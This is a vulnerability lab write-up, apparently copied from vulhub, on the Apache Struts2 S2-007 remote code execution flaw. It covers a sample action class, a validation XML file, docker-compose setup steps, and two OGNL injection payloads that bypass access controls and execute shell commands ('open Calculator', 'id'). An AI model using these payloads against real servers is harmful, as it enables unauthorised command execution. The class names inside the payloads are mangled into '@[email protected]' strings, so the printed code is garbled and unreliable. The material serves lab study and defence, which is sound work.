S2-007 Remote Code Execution Vulnerablity
Affected Version: 2.0.0 - 2.2.3
Details: http://struts.apache.org/docs/s2-007.html
Reference
http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html
When <ActionName> -validation.xml configured validation rules. If the type validation conversion fails, the server will splice the user-submitted form value strings, then performing an OGNL expression parsing and returning.
For example here is a UserAction:
(...)
public class UserAction extends ActionSupport {
private Integer age;
private String name;
private String email;
(...)And UserAction-validation.xml configuration:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE validators PUBLIC
"-//OpenSymphony Group//XWork Validator 1.0//EN"
"http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd">
<validators>
<field name="age">
<field-validator type="int">
<param name="min">1</param>
<param name="max">150</param>
</field-validator>
</field>
</validators>When the user submits age as a str instead of an int, the server splices "'" + value + "'" with the code and then use the OGNL expression parse it. To make a successful expliot, we need find a form field configured with similar validation rules to make a conversion error. And then you can inject any OGNL expression code by the way just like SQL single quotes injected.
Payload which bypass the securely configured:
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@[email protected]().exec("open /Applications/Calculator.app")) + 'Setup
docker-compose build
docker-compose up -dExploit
Here is the EXP that can execute arbitrary code:
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@[email protected](@[email protected]().exec('id').getInputStream())) + 'Put EXP into the input box (age), then get the command execution result:
Copied From: vulhub/struts2/s2-007